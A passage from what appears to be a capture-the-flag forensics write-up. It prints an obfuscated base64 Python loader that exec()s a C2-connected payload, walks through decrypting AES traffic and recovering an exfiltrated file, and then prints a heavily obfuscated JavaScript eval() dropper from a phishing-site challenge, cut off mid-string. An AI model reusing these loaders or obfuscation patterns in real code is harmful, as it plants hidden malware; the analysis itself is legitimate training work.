ldFx4YTNceGNlIWUiXFxceDEzRlx4ZWVvXHhmN11ceGNkXHhhMHRceDAxRltoXHhhZFx4YTBhXHhkN1x4MDJceGRhNVx4Y2RvXHhhOT5ceGYwXHg4OFBceDlkTVx4YjNBXHhjOFx4OTJceGQ2XHg4Ylx4MWIuXHg4Ylx4OGZceDliXHg4Y1x4ZGFceDljUVx4YTFvXHgxNFx4ZWJcJ1x4ZWJceDlmP1x4ZjFceGQ1XHg4N1BceDBjXHhiNmcqXHgxYnFYXHg5M1A9QFx4MWNceDBiXHhhYlx4ZWNcdFx4MWRxXHhhOVx4OTRceDE2XHgxMHVceDBlelx4YzdceDllRypceDEyXHgwNktceGY1XHhiOFx4MWNhXHhlNyBceDFhXHhmMFx4YjVceGE4XHg4NzlceDg2XHgxOFx4ZTJceGIwXHg5Nlx4YzFdfmBhY1tceGMyXHhkZVx4ODNceGE1RzJAWzJceDk2XHhjNWZceDdmXHgxN1x4YTdcblx4MWJceDljVVx4MDZceDA3O2BceDk2XHhhMzFcdFx4ZThceDk0dFx4YzBceGJkeldceGFlV1x4YjNeXHhmNFx4OWVceGY2XHg4MzRceDBjXHhiMiJceDhlXHg5NFx4ZGFceGFmcFx4YTQlTlx4OTNceDA0NUNceGExYEFceDAyXHhjMS1oXHg4MFx4OGRceGI2XHhjOWRceGM1XHhkZVx4OTgtXHhhMlx4YmZceGFmQlx4OGNceGQyXHg5YVx4YmVceDk4LFx4YzRceGZkXHg5MyhWXHhkMWpceGQzXHgxY0FceGI1XHhhZVx4N2ZceGFlXHg4ZVx4OWNceGIwKVx4OGI1XHg5Nlx4MGNceGZmUlx4OWVcclx0XHhhZTI0XHhmNlx4ZjZceGZiXHg4NT1ceGM3XHg4ZGRceGM4TzFceGNiXHhjZVx4YjIqXHg5OFx4MWRceGI1TFdceGFmdFx4Y2JceGNiXHhiZSlceGZjXHhjMExceGFjSlx4MDNceDk1XHgxYlx4ODVceDk0XHhkMF5ceGUydXYvXHgwMFx4MTBcclwnXHgxZVx4YzdceGI1XHhmZFx4ZTdceGU2XHhhZlx4MDNceGE2XCdceDg4VVx4YWJceGQ5XHhhODVceDhhXHhjYVx4ZDRceDg0b1x4YjBceDgzXHhjNFx4YjlceDFhXHhmNFx4OGNceGMwXHhiOVRceGFlXHg4Nlx4YTJjUFtceDgwRFx4MWFceDkxelx4Y2FceGIwXHg4M2A0XHg4NFx4OGFNXCc7clx4OTFkJVx4OTlceDg5XHhhN1x4MTBYcFx4YzhceDk2XFxceDgyW1x4ZThceDliXHgwMVx4YzBceGRkXHgwN1xyXHgxMFx4YzdceDg1XHg4M1JceDA0VGNceDFlXHg5OTwpXHhjOVx4OThgXHgxNlx4OWNceDgyYmxceGFjXHhhOUlceGVkaCtQXHhjY1x4YTdsXHhiMTdceDk3U1x4MWJceDgzV1x4YmVceGE1fFx4MDgzWkpceDgwXHhlY1x4Y2ZtXHhjOFx4ZDlceDhiXHgxYSFceGJmXHgwY1x4MTRceDEyPHtmXHhhMlx4YTBceDA1dVx4YjJceGY5XHhmMlx4OWFceGRlXHg5NXJceGEwXHhmNT4iXCdceGU5XHhlOFx4YWVceDEyXHgxYVx4MTJceDkyUVx4MTFceDkxXHhhOCJceGUyXHhiZjBceGIyXHhlNVpceDg4RFx4ZTZceDAxXHg4OCNceGQzXHhhYVx4YWJWfVx4YmRceGQ2S2hceDFhT0dceDk2Klx4YTBceGQ3XHhhZFx4ZDhcXGhceGMzVVx4ODBceDdmXHhhMFx4YjNceDA0XHg4Nlx4MGZceGE0XHhiMlx4YjVceGZiKlZWXHhhNVx4YWJceGM1IFx4YmEoVSpceDFlOFx4YTdceGExUlx4MTdceGI1SFx4Y2JoXHhmOFx4MWR9XHhmNUlceGE3VVlceGNhOCNceGY2ayEmfD5ceDEzKDxceGIzXHhjZjsjXHg4Ylx4MTFceDhlXHg5Zlx4MDdJXHgwMyBceDEzXHhmOFx4ZGU6XHhjZVdceGMwLFZceGMwWEBceGQwXHgwMlx4MDRiVCtceGMzXHhkMFx4MTR1dVx4ZWJceGJiRVx4YTRYXHhlZlx4ZWRceDFjKFx4OWFceGNjXHhmOW4rXHhmMFx4ZTBmXHg5ZnYvdjZceGVkXHhkMlx4YzYvXHhjYV5ceGQwXHg4YnRceGU5Jlx4ZGNcdFx4OTNceDgwXHg4YVx4YTRGXHhhNnhuYFx4YjdceDlkXHg4Nlx4YzdjXHhhMFkxXHhlNlx4ODlceDkyXHgwOGhceDhiXHhmOCk4P1x4MTNcblx4ZTY8XHhkOFx4ZWE1XHhlY1x4ODBceDAxYlx4YzZcXFx4YmVceDkwXHgwN1x4YzguYVx4Y2FceGNhXHg5MVx4ZDhoUVx4YjFceGM0XHhmOVx4ZjJceDFhXHg5NVx4OGNceGUxaDBccitceGIwOlx4ZDRceDAyJCFQQ1x4ODNQXHhlNExceDk5XHhiOVx4MTZxXHhkNFx4YTFceDk4XHJKMFx4OTdceGQ3XHhkYjN8XHg4MFx4ODFceGU4XHhlMS5ceDAwQFx4YThceGNhXHhjN1x4ZDVceGZjS1x4YzlceGFhXHhjNlx4ZWNceGM3XHg5N1x4YmNceDk5XHhiNm1ceGYxXHg4N1x4OWFNXHhiZE9ceGQzP1x4YmNceDk3XHg5M1x4YWZsclx4OWM9XHg4Zlx4Y2VceGZlXHhkNCpceDAzXHg5Mj8qVFx4MTg8XHg4NVx4YzIrXHgwNFx4YzNAXHgwNFx4ZjVceGYzXHhjMGppI1x4ZTRwXHgxOFx4YjVceGNkXHgxZmBiXHg4M1x4OTlceGEzXHhmY1x4MDA/XHg4ZktceGJjXHhhNmdceGQ5XHgwMFx4ZDJ2XHhkZlx4OTcrXHhkM1x4OTYxXHhhOHptXHhlNVx4OWJQXHgwNFx4ZjJMJj8gXHhjMGBceGI0XHgwMFx4Y2FceGYwYVx4YmU5Q1x4ODBiXHg4N0VceDgzXHhjZWhceGY5M3R9W1x4MWZceDlhJlx4ZmFceDBjXHgxYWBceGU1XHhjYz9lXHhkYlx4MDZceGUzPFx4ZjdJR0hceDljXSVocFx4ZWM/JFx4MTlceGI5T1x4ZDEpXHhiOVx4YjJceDBjXHhiN1x4MDNaR1hceGUzXHg5Mlx4MDhceGQyXHhjOVZCcCxceGI3XHhlY1x4OTQzXHg4YVx4ZDJceDFmNUFASFFceDlkIFx4ODBceGEzcDhceGYxXHhhMk1ceDA3fFx4OTVuXHhlM1x4OTJrXHhmOVx4YjVceGQwIFx4YTdceGMwXHg4NS9ceGZjQ11ceDA0PFx4ZDVcbjVceDg3XHgxMVx4MTdceGU0b0BceDliKlx4YzBcblx4YzNOa09oXHhmOG4gXG5qP1x4OWY9XHhmNX1ceDA2XHgxNWhceDk3N0FdXHgwYlx4YjhceDk0XHhiZVx4YjBceGQ3XHhiZVx4YmFceDhlXHhiN1x4YWZuXHhhNlx4OWYjXHgwOD81XHhkZVx4ZGRtP1x4ZWNceGM2XHhhYTNceGQ2alZceDBiLlx4ZWFtXHhhYlx4OTRgXHg5NU9ceDEzXHgxODhceGM2XHhjOEkkOVx4ODNceDdmaWxceGYyXHhmOVx4MTdceDE5aFx4OTMqXHhiZmtceGIyXHhlYSNceGFkXHhiZlx4Y2JceGU1e0NceDE1XHhjZWZeXHhjYVx4ODhceDk5V3lhXHhhY1x4OGNceGRiXHgxMVx4MTZceGQ5XHgwN1x4MDV5XHhlNUNceGI0LFx4YzJceGMzXHhjZFBceGQyXHhlY1x4ZTRceGNlVCRceGFhKlx4YTEmW1tceDhkXHhiN1x4YzVceDliXHhjM0NceGJhKV9GXHhiYVx4YmRceGFjPE43KWdceDlmXHhjMVx4ZDhwXHhhYlwnXHhkOSNLXHg5NjZ6XHhmY1x4OWRceGViXHhkN3dceGI3XHhkMFx4ODlceGE0XHhiOSBceDg4XHg4OFx4ODQ2XHhiNVx4YTFceDg0Slx4Y2VceGEyXHgwYlx4ZTg3N1x4ZjdceGYzXHgxN1x4MGNceGQzXHhkMClceGUzXHgwN1x4ZGN2bVx4YTAjXHg5Nlx4ZmZ4XHhhYVx4ZTZFX1x4MDdhT1x4ZWZqXHhiYVx4ZTNjXHg5Ylx4ZGVsJFx4ODNoXHg5ZVx0TFx4MWZceGEwfSUicFx4OWNceGQ0XHhkMVx4OWVceDhlXHhmZGZdXHRceGFjI1x4YmZceDE1XHg5YzxceGYzLVx4YzJaalx4OTlceGFlXHhjOC5ceGIzXHg5ZDVceGZhXHhlMlx4YWVceGVhXHhiYVx4ZjRceGM2M1x4MDRPdFx4ZjlceDEyXHhkMXtuTUpCXHgxYixceGJjXHhiZWtceGEwXHhjYVx4YTZceGE1XHg5My9ceDBmXHhhMSlZXHhiNHYyTDNceGE1XHg4ZFx4MGNxKFx4MGZceDE4XHgxMFx4ODJQLSJceGU1XHhlMVx4ZThceGIzXHhhM1N4Slx4Y2NceDBjXHhkY1x4YWUtblx4Zjd9d1x4MTlceGFlLlx4Y2JpXFxiXHhkZjBbXHgxMFx4ZTlceDFhMnhWWktceGQwU1x4ODhceGQyYyYrXHhmN1x4ODNPalx4OWRceGFiXHhiN1VoInpceDk3XHhmMFx4OWRceGE3XHg5Mlx4ZDZbKHdceDBlKVx4YzhceGZmTXxceGEzalx4YTE1XHhjN1x4MDRceGU0Wlx4ZDhceGEyXHg4OFx4MDhcclx4ZWFceDkwSlx4YmFNXHgwMVx4YjBceGQydVFceGMwXHhhMVx4Y2RcXFx4YWRWXHhlMlx4ZjMuXHgwYmxceGU4XHhhOV4kXHhjOVx4OTVceGY2VFx4MTNXXHgxOFx4ODI0XHgwMTZceGM4JSxceDA4XHhiZVxuXHhhMlx4ZDVBQlx4ZGQ1Wz1tNzpceDA2XHhhMFx4ODBceDg2XHgwNFx4YjVceGU1RVx4ODNLPnF5WVx4OTRTXHhiOFx4ZDgwXHhkNltceGMyXHg4NGtceDBiXHhkYlx4ZWNceDE1XHhiNlx4Y2YtXCdceGYwZUBmXHhhOVE2VVx4Y2JpXHgxM05ceGJhc10zUVx4YjFceDhkaUZQXHhiYiFQXHhmZlx4ZDJceDgyblx4OThceDlkSF5ceGQ2a1x4ZDNceDhlJVx4ZTBrXHhjYVx4OWJceGQ0XHhmZlx4OTBceGJhLVFceDE1XHhhNVx4ZDNceDE0T1x4ZTBceDEyXHgwNl0iXHhiMlx4YThceDgyXHhhY2BcJ0xceDk4XHhiZFx4YmNiO1x4YWRceDEzVFx4OTVceDE1b1x4MWEhXHg4OVx4YzNceGFkTnx6XHg5YnZceGY5XHg5OFx4MTRceGNhXHhmZlx4ZTJceGVlSFx4YTdcblx4MTJceDExXHhhNU5ceGUwXHgwMCcpKSk="

decoded_script = base64.b64decode(encoded_script).decode("utf-8")
exec(decoded_script)
1
2
└─$ python3 decode.py
<code object <module> at 0x2bd99dc0, file "Py-Fuscate", line 1>

Question 4: What is the IP address and port used by the malware to establish a connection with the Command and Control (C2) server?

Similarly, we can modify exec() to dis.dis() and execute the Python script directly. Once executed, the Python bytecode is disassembled for further analysis.

pie7

Analyzing the code, we can see that the script has a function to connect to the C2 server.

pie8

Question 5: What encryption key did the attacker use to secure the data?

Further down the code, we can see that it encrypts each remote command with AES-CBC.

pie9

Here, you can see the AES key is between the user tag and <SEPARATOR> tag. Since we already have the PCAP, the AES key can be identfied right after the malicious Python script is executed.

pie10

pie11

Question 6: What is the MD5 hash of the file exfiltrated by the attacker?

Decrypting the first few messages, we can see that a PDF file was targetted by the attacker. Extracting it with CyberChef, the MD5 hash can be obtained.

pie12

1
2
└─$ md5sum flag.pdf
aa763fe4d68ea61068db3f5747e9309d  flag.pdf

Tales for the Brave [Forensics]

Question: In Eldoria, a once-innocent website called “Tales for the Brave” has become the focus of unsettling rumors. Some claim it may secretly trap unsuspecting visitors, leading them into a complex phishing scheme. Investigators report signs of encrypted communications and stealthy data collection beneath its friendly exterior. You must uncover the truth, and protect Eldoria from a growing threat. When debugging JavaScript, ensure you use a Firefox-based browser.

Flag: HTB{APT_c0nsp1r4c13s_b3h1nd_b3n1gn_l00k1ng_s1t3s}

We are given a website to investigate. However, since this isn’t a web challenge, I assume we don’t have to perform any web exploits on the webpage to get the flag.

tales1

Checking the source code, it seems that a suspicious JavaScript was placed within the same webpage and it was obfuscated heavily.

tales2

1
var _$_9b39=(function(n,w){var r=n.length;var j=[];for(var e=0;e< r;e++){j[e]= n.charAt(e)};for(var e=0;e< r;e++){var d=w* (e+ 439)+ (w% 33616);var a=w* (e+ 506)+ (w% 38477);var v=d%r;var p=a%r;var x=j[v];j[v]= j[p];j[p]= x;w= (d+ a)% 3525268};var c=String.fromCharCode(127);var q='';var m='%';var t='#1';var o='%';var u='#0';var k='#';return j.join(q).split(m).join(c).split(t).join(o).split(u).join(k).split(c)})("Ats8ep%%e6Sr%prB%feUseEynatcc4%ad",1198358);;;;;;;;;;;;;eval(CryptoJS[_$_9b39[1]][_$_9b39[0]]({ciphertext:CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](btoa(unescape("\u0062\u00FB\u0033\u00C0\u00DC\u005C\u0051\u001F\u0062\u00F0\u0023\u0053\u0013\u007F\u0014\u003D\u0022\u00D4\u0049\u009A\u00F5\u005B\u0040\u00D3\u004B\u008F\u009D\u00AC\u00C8\u0035\u0009\u0009\u0066\u005A\u0086\u0083\u007E\u003D\u00CA\u00E6\u00CD\u0043\u0001\u00ED\u00B9\u0020\u0003\u0056\u00D3\u0015\u0023\u0001\u00AC\u0001\u00F9\u009E\u0024\u001A\u00BE\u00DF\u007F\u004A\u00D7\u0030\u0064\u00C2\u008F\u00BE\u00C9\u0000\u0043\u0027\u0070\u00DD\u0050\u006B\u00A7\u0099\u00AA\u00BC\u00BA\u0010\u00C3\u0031\u005E\u00C3\u00A7\u0024\u00C3\u0065\u0069\u00DB\u00A1\u00A8\u0079\u0093\u00E0\u0056\u00BD\u00C4\u0095\u00A1\u0092\u000A\u0046\u007B\u00CB\u0076\u00B6\u004B\u00EC\u00AF\u0070\u0098\u008F\u008F\u004B\u0033\u0040\u00F0\u0074\u0061\u00F9\u0076\u0009\u00BF\u0015\u005A\u007A\u00BE\u00B6\u009D\u0049\u005B\u0028\u0028\u000B\u00DD\u0043\u0092\u009F\u00D6\u0043\u00A1\u0083\u002B\u00B8\u00E6\u006B\u003B\u002C\u000A\u00D9\u0019\u0078\u005E\u00E8\u0092\u00E7\u00FD\u0028\u0079\u0046\u004D\u00EE\u0074\u00B7\u00FD\u0094\u00A9\u0084\u00E6\u0085\u00A0\u00A8\u00E1\u00A7\u0044\u009A\u004C\u0021\u0050\u0056\u008B\u00CC\u00AA\u00EF\u0076\u0065\u00CD\u0021\u0001\u0075\u0041\u006F\u009D\u00CB\u006E\u00A5\u0055\u00F4\u0033\u0043\u000A\u0083\u005C\u00F4\u00D9\u0025\u008A\u0098\u003A\u00C6\u0088\u00E1\u0076\u0035\u00EF\u00F9\u00D4\u00BD\u004E\u0048\u0028\u0056\u0069\u0040\u003C\u00B1\u0086\u009E\u00E1\u00D9\u00BE\u0084\u005E\u0022\u0054\u0026\u00FE\u0006\u0022\u0000\u00D8\u0083\u0089\u00F4\u0075\u0078\u0052\u009C\u00DA\u0098\u0037\u00BA\u0004\u0016\u0046\u00A6\u00AD\u0088\u001B\u00D4\u0016\u000B\u00B6\u00BF\u002F\u0061\u00C9\u009A\u0056\u0048\u001C\u0085\u0080\u006D\u0031\u0066\u00F9\u00FA\u002F\u00F1\u0036\u0079\u0020\u00E7\u00B2\u002F\u00B6\u00B9\u001E\u00A7\u00AC\u0097\u00C5\u0015\u008B\u00CA\u005A\u008A\u009A\u0033\u001D\u003E\u0086\u006F\u0015\u0043\u0076\u0067\u000A\u00D0\u0007\u009B\u00A1\u00BB\u002F\u0026\u00CA\u0030\u00EB\u0023\u0093\u00C7\u001D\u00AC\u0057\u0073\u002F\u0028\u004A\u00A5\u00EC\u00D1\u005B\u0045\u0077\u0030\u0047\u0008\u0097\u00C4\u003B\u001C\u00CB\u00E9\u0033\u00E9\u0013\u007B\u00F6\u00D1\u00A4\u000A\u00AA\u0090\u008E\u0041\u005E\u000F\u00FA\u00AB\u00F4\u0068\u0087\u00C8\u009C\u00A6\u0037\u0083\u00EC\u0021\u0056\u00D8\u00B1\u0095\u0010\u00CC\u008D\u0023\u000F\u0074\u002F\u007B\u0085\u0037\u006C\u00D8\u00C8\u000C\u006A\u003A\u00B3\u0071\u0029\u00AC\u00B9\u004D\u0011\u00EF\u0097\u00F8\u00E2\u0044\u00E5\u00BF\u00FC\u0053\u00CF\u0026\u00CE\u00F2\u0046\u0059\u0017\u004D\u008B\u00F1\u002C\u0089\u00E1\u0056\u0040\u0058\u00A8\u00AC\u009B\u00F2\u0063\u0086\u0085\u0073\u009F\u00B4\u00B5\u00B3\u0041\u0037\u00F8\u0034\u009C\u00F4\u0088\u0059\u00D0\u008E\u004A\u00B5\u00C6\u0066\u0044\u0042\u0026\u00F2\u0008\u0090\u00F8\u0075\u00A5\u006C\u0041\u008D\u00B8\u0061\u00D4\u00E8\u0089\u00DD\u0087\u0087\u0014\u00C9\u0093\u0013\u00FC\u007D\u007E\u00E5\u0048\u0043\u002E\u002E\u004D\u00E6\u0078\u00FA\u00A1\u00F7\u008F\u0095\u00EC\u00B3\u006F\u003A\u00CF\u00A7\u00BF\u00F3\u0051\u0094\u008B\u007C\u00A0\u0030\u009B\u0019\u00C0\u00FE\u003B\u0052\u0041\u00CB\u00AF\u0008\u00E2\u00A8\u00A3\u0027\u0075\u00DE\u00A8\u00FF\u005C\u0054\u008B\u0069\u0019\u00F5\u007B\u00A0\u00CF\u0065\u0079\u00B6\u00FC\u0099\u0037\u0043\u007C\u00CD\u007F\u0068\u00E6\u00D3\u00E7\u0084\u0093\u0010\u0088\u000F\u00B8\u0040\u001D\u001B\u0038\u00CA\u0010\u0043\u0003\u0094\u00BD\u0076\u00AF\u000C\u000D\u00DA\u009D\u0049\u000B\u005F\u003E\u00A2\u00F3\u00D5\u0045\u00F8\u00DD\u001E\u0057\u0003\u0053\u0044\u006B\u009E\u003B\u00A7\u00DF\u004A\u001A\u0040\u0094\u0080\u00EC\u00E8\u009B\u0010\u00E6\u0040\u0079\u0057\u0020\u009F\u00FF\u001F\u0042\u006D\u0057\u0055\u00A1\u003F\u0091\u006E\u00D7\u00F7\u00A2\u0089\u00F2\u007A\u000D\u0088\u005E\u00CE\u002D\u00C5\u00C3\u0001\u0071\u002A\u007A\u003D\u009C\u00F5\u00C3\u0080\u00CA\u002D\u0069\u004B\u005B\u0061\u00CD\u0055\u000F\u009C\u00C6\u00E6\u00FB\u0038\u00A1\u00FB\u00D1\u00BA\u0062\u00BE\u0031\u0072\u00EF\u00C0\u00D6\u0056\u00FF\u00DA\u00FE\u00CA\u0081\u0001\u0072\u00BC\u0025\u0079\u00B8\u007F\u0055\u00C5\u0071\u008C\u000C\u00D4\u0059\u0030\u0022\u00CC\u00C8\u005D\u005B\u0077\u0009\u00A2\u0038\u0054\u0013\u003F\u00BC\u00CD\u001F\u0039\u00DE\u001A\u0046\u0057\u0016\u0045\u001F\u00FF\u001E\u002F\u002C\u0032\u00EA\u0029\u0035\u00A1\u008B\u001B\u00F7\u0048\u00D6\u000A\u004C\u009F\u0044\u0093\u00D2\u002B\u0023\u00F9\u0022\u0044\u001C\u0012\u00D6\u0061\u0097\u00AF\u004B\u001E\u00DC\u000E\u0033\u00F3\u00A1\u00FA\u0050\u00CE\u0000\u0024\u0086\u00C9\u0045\u0061\u00A7\u00BC\u0074\u0096\u0058\u0087\u00B6\u00D4\u006A\u0087\u00BB\u0027\u00D8\u00B6\u0045\u007D\u0030\u0097\u0089\u005D\u0034\u0023\u0042\u005B\u003D\u00A0\u0012\u00F3\u0032\u00EA\u0040\u006B\u0023\u00EA\u00A9\u003D\u006C\u0013\u009B\u007A\u0096\u00CA\u0023\u00CC\u009C\u001A\u0083\u0058\u0004\u0098\u005F\u008B\u0048\u0001\u0091\u00CF\u008F\u00D0\u004F\u0092\u0015\u0076\u00C0\u0078\u0072\u000D\u0071\u0001\u0022\u0063\u00B6\u007D\u00E9\u00D3\u004B\u00A7\u008F\u00ED\u00F7\u0016\u00AB\u002D\u00B9\u0001\u00F2\u008B\u00E9\u002F\u0062\u00EE\u003C\u008D\u0040\u0016\u00C0\u00A7\u0017\u0065\u00B9\u002F\u009E\u00DC\u00E4\u00BC\u00FD\u00E7\u0023\u002C\u0066\u000A\u0024\u008C\u00F2\u00E4\u00AE\u00A3\u00C1\u0068\u007D\u001E\u0058\u000F\u0081\u00D5\u0047\u0010\u005B\u000A\u002A\u00B6\u0041\u003A\u00A8\u001D\u00DD\u0091\u0008\u007C\u005D\u00E1\u0013\u0002\u0004\u00B8\u0087\u00FA\u0019\u0009\u00B8\u00C1\u0044\u005D\u006E\u007D\u000E\u0092\u001E\u0034\u008D\u0076\u00B7\u00D4\u009E\u0059\u004C\u00CD\u0011\u002D\u0047\u00A0\u00EA\u002A\u0098\u0039\u00A5\u00DF\u008F\u0041\u00FF\u0000\u00C6\u003B\u00E0\u0025\u00F4\u0005\u00C0\u00FB\u005B\u0013\u0090\u0038\u00FA\u0031\u0037\u00BA\u0011\u006E\u00DB\u009A\u00BD\u0074\u004F\u0047\u0039\u00B8\u0047\u001E\u00F6\u00BF\u0008\u00E7\u0029\u004A\u0031\u00C8\u009F\u0099\u0045\u009A\u00B4\u00FF\u0009\u0052\u00BC\u00FE\u00C3\u006A\u0092\u007D\u000E\u00E4\u00A8\u000B\u007E\u0054\u000E\u0088\u00B2\u0058\u00F5\u00DD\u0044\u0054\u00F9\u0067\u0072\u00B0\u00DD\u00F6\u0047\u00C3\u00D5\u00A3\u00AE\u003C\u0051\u003E\u00DE\u0019\u00BC\u0041\u0065\u0024\u0067\u0045\u0075\u002E\u0008\u0086\u00AF\u0037\u00CD\u008B\u0000\u0062\u0063\u0069\u00C4\u003B\u0065\u00F7\u008A\u00C9\u0043\u00FC\u005E\u0080\u0058\u0046\u002A\u0059\u0074\u00D0\u0041\u00D3\u0069\u0027\u0045\u0053\u0001\u00A7\u00F4\u0065\u003C\u00D5\u00CE\u008E\u0066\u0077\u00A1\u00D8\u003B\u00EA\u0054\u003F\u003B\u00EE\u00E8\u00BD\u00B6\u0040\u00FE\u0009\u0071\u00DA\u001B\u007F\u00D4\u0019\u003E\u0065\u0062\u00F1\u00CA\u00EB\u0073\u0004\u0061\u00A4\u00B6\u006B\u0002\u0082\u00AA\u00DA\u00DA\u00FA\u007B\u0093\u005E\u0053\u0080\u0049\u0017\u008E\u00ED\u00EF\u0058\u0016\u005D\u0041\u006C\u0015\u0088\u0088\u0085\u00A6\u004D\u0003\u00A8\u0014\u001C\u000B\u0085\u0049\u0042\u006A\u00DA\u006C\u00CD\u00DD\u00C3\u0049\u00F7\u00E4\u0049\u0049\u0027\u0018\u00E4\u00A8\u0045\u0069\u00F5\u000A\u0009\u0045\u00CD\u00BC\u0075\u0047\u009A\u0056\u00BE\u002A\u0026\u00C0\u00E8\u007C\u004E\u000D\u003B\u00E8\u0017\u00BA\u0098\u008D\u0008\u0062\u0047\u00EC\u00D4\u0005\u00AD\u003D\u0094\u008B\u00A0\u0023\u0054\u0016\u00A9\u0022\u00E9\u00DD\u007A\u0046\u00D1\u0022\u0074\u0020\u0006\u004B\u006F\u0099\u003F\u004E\u00B1\u001C\u00D6\u0081\u00D9\u001C\u003D\u0099\u0086\u00EA\u00EF\u0084\u0088\u0044\u0060\u004D\u0048\u0039\u0099\u0015\u00D8\u00D4\u0029\u009F\u00E2\u0056\u00E4\u001A\u0008\u0049\u00A3\u009C\u0056\u00AE\u00AC\u0052\u0089\u0002\u00D8\u00FB\u007E\u0078\u006D\u00AF\u00E9\u0065\u0020\u00A4\u00C0\u0013\u007D\u00C0\u0085\u0072\u00CF\u00FB\u00DD\u00F9\u00C3\u00A7\u0097\u000E\u0048\u003D\u00ED\u00A8\u0055\u00FA\u0070\u00F3\u001F\u0034\u0012\u00E1\u00C4\u000D\u00A1\u0055\u000F\u008D\u0000\u0039\u00BE\u0070\u0078\u0005\u0051\u0030\u00BA\u0023\u00C2\u00F8\u006F\u0045\u0098\u00B5\u00BE\u00A5\u0031\u0007\u0078\u0097\u0078\u00B8\u002E\u00C0\u0069\u0037\u0099\u0019\u00E3\u007D\u0025\u0003\u002B\u00EF\u0008\u00AD\u0055\u0094\u00E2\u009F\u0008\u0016\u0078\u0029\u00A7\u0067\u0059\u006A\u000F\u0080\u008D\u00A4\u001F\u0003\u00BD\u00AE\u0071\u0057\u0043\u0049\u00D4\u0034\u0012\u00AD\u0069\u00E3\u0085\u001F\u002B\u0063\u00BB\u00A7\u00DF\u005C\u00C6\u000C\u0076\u000B\u0006\u003F\u00D9\u0086\u00B5\u00D4\u0095\u00D8\u0064\u00E4\u00FA\u00F8\u0038\u0023\u008D\u00E6\u00A8\u0022\u00B6\u0047\u00DD\u005E\u00D6\u00CE\u001D\u0084\u003E\u0088\u00A5\u00C7\u0071\u004E\u0009\u00CA\u0023\u00A6\u0078\u00FD\u00C2\u0053\u003F\u00FE\u00A1\u002B\u0051\u0000\u00E6\u00FF\u00C5\u0045\u0073\u00BA\u0061\u004A\u00AE\u00C8\u00CF\u0006\u0036\u0044\u00FE\u0072\u00BF\u00B1\u005C\u0051\u00EB\u0003\u00C9\u00F3\u0020\u00B8\u0071\u00FA\u0046\u009D\u001A\u00D4\u000F\u0072\u0082\u0094\u0045\u0016\u000E\u00AA\u00F6\u00E2\u000E\u00A1\u001B\u008C\u000A\u0082\u0049\u003E\u0093\u00CB\u0087\u00CB\u00E9\u009C\u00B0\u0030\u0036\u007A\u00A6\u002A\u0016\u0020\u00DB\u00B1\u009E\u008E\u0003\u00A8\u008E\u005B\u005B\u0099\u001C\u00EA\u002E\u00AB\u000D\u005D\u00A3\u00A0\u00E8\u00CA\u00D7\u000B\u0081\u003D\u002F\u0039\u0083\u006F\u006B\u000D\u003A\u0025\u00CC\u00EE\u00DE\u006C\u0037\u007D\u0044\u0062\u0062\u0033\u0047\u0082\u00D9\u000D\u00A3\u0095\u00E1\u00F5\u0043\u00F3\u00A4\u00F3\u006E\u0071\u0019\u0021\u00D6\u009E\u000C\u0080\u0007\u00E7\u0076\u0034\u00AC\u0019\u0021\u0019\u002B\u00D3\u00C2\u00F2\u0072\u002B\u00C6\u00A8\u0043\u00F6\u00D9\u00B9\u004F\u0067\u0097\u0093\u007B\u0040\u001E\u0004\u0020\u00FC\u003F\u00D3\u00AD\u0079\u006E\u00E9\u008C\u00C7\u00EA\u00A7\u0009\u0054\u009D\u0030\u0088\u0044\u0016\u0017\u0061\u00DC\u00F6\u0057\u00C5\u0080\u001B\u0000\u0026\u0033\u0034\u0079\u009C\u0021\u00BC\u00A7\u0032\u0083\u00D7\u0082\u00CA\u0029\u0031\u0000\u0085\u0031\u0045\u0009\u0002\u00D9\u00F8\u0025\u00D8\u00E4\u0019\u0003\u00FA\u00B8\u00A5\u009B\u0093\u001F\u00FC\u00E6\u002F\u00F0\u0018\u00A3\u0021\u00E4\u0071\u001D\u0018\u0014\u00E9\u0027\u007A\u0070\u0072\u00D7\u002D\u00E2\u00A7\u0048\u00F7\u009F\u0072\u00E2\u00C7\u0094\u00A9\u00D4\u00E7\u0004\u0092\u00F1\u0076\u001D\u0031\u00E7\u009D\u00D3\u0087\u00EF\u00D4\u00D8\u00C5\u001F\u00FF\u008B\u00E9\u0041\u00EA\u00E9\u002D\u005A\u006C\u00A8\u008E\u0076\u0072\u0072\u0015\u003C\u00E6\u0004\u0005\u00A1\u00C7\u0001\u00EF\u00BB\u0055\u006E\u0030\u0017\u00E4\u0076\u00F9\u00FA\u002C\u0064\u008D\u00AE\u000D\u0097\u00D8\u0040\u005A\u00C4\u0039\u00E4\u006A\u0011\u0012\u00B5\u0061\u00FE\u0016\u001F\u00BA\u0070\u005A\u003A\u008F\u0033\u0091\u00F6\u0016\u00E2\u00E1\u0076\u0088\u00B3\u0007\u0068\u0032\u00CC\u0040\u00FB\u00E5\u0029\u008C\u0052\u00FC\u00CB\u000A\u00DF\u00EC\u00FB\u00AA\u0034\u003C\u00A1\u00D4\u00A1\u004B\u00C7\u0072\u006F\u00CF\u0003\u0004\u00D7\u002E\u00C9\u00B5\u0096\u008F\u00C6\u0039\u0045\u00A2\u008F\u0087\u0011\u0078\u0052\u00E8\u0080\u0086\u0091\u0082\u00AC\u00E5\u004F\u000B\u0040\u00EE\u0081\u00F4\u0025\u0001\u008E\u0019\u00B8\u00D2\u0052\u0028\u00ED\u00E5\u0029\u00DD\u0076\u000A\u0002\u00B9\u003F\u00D8\u000E\u00EB\u003C\u00DA\u00A1\u005A\u006E\u009E\u001B\u006A\u0034\u002A\u0071\u0083\u005C\u0011\u00E2\u00B9\u00A8\u0047\u0046\u00A9\u005E\u0056\u0088\u0053\u003E\u00ED\u0028\u0019\u001A\u00E6\u0050\u00AA\u0095\u0017\u000F\u00C3\u002D\u00C1\u0088\u004E\u0025\u007D\u0004\u0017\u0098\u005B\u0030\u00A1\u001E\u003C\u00FC\u007B\u00D1\u000B\u00C9\u00B3\u00A0\u002E\u0065\u0080\u0034\u0084\u0022\u00D4\u0079\u0053\u007D\u00D0\u0002\u005B\u00A2\u0060\u009B\u00BD\u000A\u006D\u009B\u007D\u00D5\u00A6\u0067\u00C8\u006E\u007C\u006B\u0090\u00C8\u000D\u00E4\u0026\u002E\u00BF\u0044\u0009\u00D3\u000F\u0047\u0001\u003C\u006A\u0012\u008C\u0028\u00DC\u00F2\u0041\u00AF\u0032\u0012\u0087\u0007\u008E\u00AC\u0011\u00F7\u007D\u0007\u0027\u004C\u0097\u0010\u00B3\u00D1\u00B7\u00B7\u0055\u000E\u001F\u00EC\u0025\u0082\